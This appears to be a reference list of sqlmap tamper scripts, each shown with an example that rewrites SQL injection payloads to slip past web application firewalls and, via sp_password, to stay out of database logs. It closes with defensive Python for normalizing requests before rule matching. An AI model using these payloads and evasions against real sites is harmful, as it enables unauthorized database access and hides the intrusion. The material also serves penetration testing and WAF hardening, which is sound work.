Use tamper script in sqlmap to bypass WAF
Script name: 0x2char.py
Function: Replace each (MySQL) 0x<hex> encoded string with its equivalent CONCAT(CHAR(),...) counterpart
Tested against:
MySQL 4, 5.0 and 5.5
>>> tamper('SELECT 0xdeadbeef')
'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))'
Script name: apostrophemask.py
Function: Replace the apostrophe character with its UTF-8 full-width counterpart
>>> tamper("1 AND '1'='1")
'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
Script name: apostrophenullencode.py
Role: Replace the apostrophe character with its illegal double-byte counterpart
>>> tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271'
Script name: appendnullbyte.py
Role: Append an encoded null byte character at the end of the payload
Requirement:
Microsoft Access
Notes:
Used to bypass weak web application firewalls when the back-end database management system is Microsoft Access
>>> tamper('1 AND 1=1')
'1 AND 1=1%00'
Script name: base64encode.py
Role: Replace the payload with its base64 encoding
>>> tamper("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='
Script name: between.py
Effect:
Use 'NOT BETWEEN 0 AND #' instead of the greater-than operator ('>')
Replace the equals operator ('=') with 'BETWEEN # AND #'
Tested against:
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0
Notes:
Useful to bypass weak web application firewalls that filter the greater-than character
The BETWEEN clause is SQL standard. Therefore, this tamper script should work against all databases
>>> tamper('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
>>> tamper('1 AND A = B--')
'1 AND A BETWEEN B AND B--'
Script name: bluecoat.py
Role: Replace the space character after the SQL statement with a valid random blank character, then replace the character '=' with the operator LIKE
Requirement:
Blue Coat SGOS with WAF activated, as stated in the WAF documentation
Tested against:
MySQL 5.1, SGOS
Notes:
Used to bypass the WAF rule configuration recommended by Blue Coat
>>> tamper('SELECT id FROM users WHERE id = 1')
'SELECT%09id FROM%09users WHERE%09id LIKE 1'
Script name: chardoubleencode.py
Purpose: Double URL-encode all characters in a given payload (characters that are already encoded are not processed)
>>> tamper('SELECT FIELD FROM%20TABLE')
'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'
Script name: charencode.py
Role: URL-encode all characters in a given payload (characters that are already encoded are not processed)
Tested against:
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0
Notes:
Very useful to bypass very weak web application firewalls that do not URL-decode the request before processing it through their rule set
The web server will pass on the URL-decoded version anyway, so it should work against any DBMS
>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
Script name: charunicodeencode.py
Role: Unicode-URL-encode the string
>>> tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'
Script name: equaltolike.py
Function: Use LIKE instead of the equals sign
>>> tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM users WHERE id LIKE 1'
Script name: space2dash.py
Function: Bypass filtering by replacing the space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')
>>> tamper('1 AND 9227=9227')
'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
Script name: greatest.py
Effect: Bypass filtering of '>' by replacing the greater-than operator with its GREATEST counterpart
Tested against:
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0
>>> tamper('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'
Script name: space2hash.py
Function: Replace spaces with a # sign followed by a random string and a new line
>>> tamper('1 AND 9227=9227')
'1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'
Script name: halfversionedmorekeywords.py
Role: Bypass the firewall when the database is MySQL by adding a MySQL versioned comment before each keyword
>>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
Script name: space2morehash.py
Function: Replace spaces with a # sign followed by more random strings and new lines
>>> tamper('1 AND 9227=9227')
'1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'
Script name: ifnull2ifisnull.py
Effect: Bypass filtering of IFNULL. Replace 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'
>>> tamper('IFNULL(1, 2)')
'IF(ISNULL(1),2,1)'
Script name: space2mssqlblank.py (mssql)
Role: Replace spaces with other blank characters
>>> tamper('SELECT id FROM users')
'SELECT%A0id%0BFROM%0Cusers'
Script name: space2mssqlhash.py
Role: Replace spaces
>>> tamper('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'
Script name: modsecurityversioned.py
Function: Enclose the complete query in a versioned comment
>>> tamper('1 AND 2>1--')
'1 /*!30874AND 2>1*/--'
Script name: space2mysqlblank.py
Role: Replace spaces with other blank characters (MySQL)
>>> tamper('SELECT id FROM users')
'SELECT%A0id%0BFROM%0Cusers'
Script name: space2mysqldash.py
What it does: Replace the space character (' ') with a dash comment ('--') followed by a new line ('\n')
Note: The earlier entry was for MSSQL; this one is for MySQL
>>> tamper('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'
Script name: multiplespaces.py
Role: Add multiple spaces around SQL keywords
>>> tamper('1 UNION SELECT foobar')
'1     UNION     SELECT     foobar'
Script name: space2plus.py
Role: Replace spaces with +
>>> tamper('SELECT id FROM users')
'SELECT+id+FROM+users'
Script name: nonrecursivereplacement.py
Role: Double the query keywords. Replace predefined SQL keywords with representations suited to replacement filters (e.g. .replace("SELECT", ""))
>>> tamper('1 UNION SELECT 2--')
'1 UNIOUNIONN SELESELECTCT 2--'
Script name: space2randomblank.py
Effect: Replace the space character (' ') with a random blank character from a valid set of alternate characters
>>> tamper('SELECT id FROM users')
'SELECT%0Did%0DFROM%0Ausers'
Script name: sp_password.py
Purpose: Append 'sp_password' to the end of the payload so that it is automatically obfuscated in the DBMS logs
>>> tamper('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'
Script name: unionalltounion.py
Role: Replace UNION ALL SELECT with UNION SELECT
>>> tamper('-1 UNION ALL SELECT')
'-1 UNION SELECT'
Script name: randomcase.py
Role: Random case
>>> tamper('INSERT')
'INseRt'
Script name: unmagicquotes.py
Purpose: Use wide characters to bypass GPC addslashes
>>> tamper("1' AND 1=1")
'1%bf%27--'
Script name: randomcomments.py
Role: Use /**/ to split SQL keywords
>>> tamper('INSERT')
'I/**/N/**/SERT'
Script name: securesphere.py
Role: Append a special string
>>> tamper('1 AND 1=1')
"1 AND 1=1 and '0having'='0having'"
Script name: versionedmorekeywords.py
Purpose: Comment-based bypass
>>> tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#')
'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'
Script name: space2comment.py
Role: Use comments to replace space characters
>>> tamper('SELECT id FROM users')
'SELECT/**/id/**/FROM/**/users'
Script name: halfversionedmorekeywords.py
Function: Add comments before keywords
>>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
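Seen from the defending side, the charencode note in this list names the gap that most of these entries depend on: a filter that matches the raw request text instead of a decoded, normalized form. The following is an added example, not part of the original page and not sqlmap code; the single rule, the function names and the sample strings are assumptions constructed here to show one rule evaluated with and without canonicalization.

```python
import re
from urllib.parse import unquote

# Hypothetical single rule, for illustration only (not from any WAF product).
RULE = re.compile(r"\bunion\s+(?:all\s+)?select\b")

def canonicalize(value: str, max_rounds: int = 5) -> str:
    """Reduce a request parameter to one canonical form before rule matching."""
    # URL-decode until stable, so double encoding (%2553 -> %53 -> S) is undone.
    # latin-1 keeps single bytes such as %A0 intact instead of mangling them.
    for _ in range(max_rounds):
        decoded = unquote(value, encoding="latin-1")
        if decoded == value:
            break
        value = decoded
    # MySQL executes the body of /*!NNNNN ... */ comments: keep the body.
    value = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", value, flags=re.S)
    # Plain /* ... */ comments and '#...\n' / '--...\n' act as token separators.
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    value = re.sub(r"(?:#|--)[^\n]*\n", " ", value)
    # Collapse every blank variant (tab, VT, FF, CR, LF, NBSP, NUL) to one space.
    value = re.sub(r"[\s\x00]+", " ", value)
    return value.lower().strip()

def naive_match(value: str) -> bool:
    """Rule applied to the raw value, as a WAF that skips normalization would."""
    return bool(RULE.search(value.lower()))

def normalized_match(value: str) -> bool:
    return bool(RULE.search(canonicalize(value)))

# Constructed samples shaped like the tamper outputs listed on this page.
SAMPLES = {
    "plain": "1 UNION SELECT 2--",
    "randomcase": "1 uNiOn SeLeCt 2--",
    "space2comment": "1/**/UNION/**/SELECT/**/2--",
    "chardoubleencode": "1%2520UNION%2520SELECT%25202--",
    "blank characters": "1%A0UNION%0BSELECT%0C2--",
    "space2hash": "1%23nVNaVoPYeva%0AUNION%23ngNvzqu%0ASELECT 2",
    "versionedmorekeywords": "1/*!UNION*//*!ALL*//*!SELECT*/NULL",
    "benign": "union station, select seats",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:22} naive={naive_match(raw)!s:5} normalized={normalized_match(raw)}")
```

Pattern matching after canonicalization is a detection layer only; parameterized queries in the application remove the injection point itself.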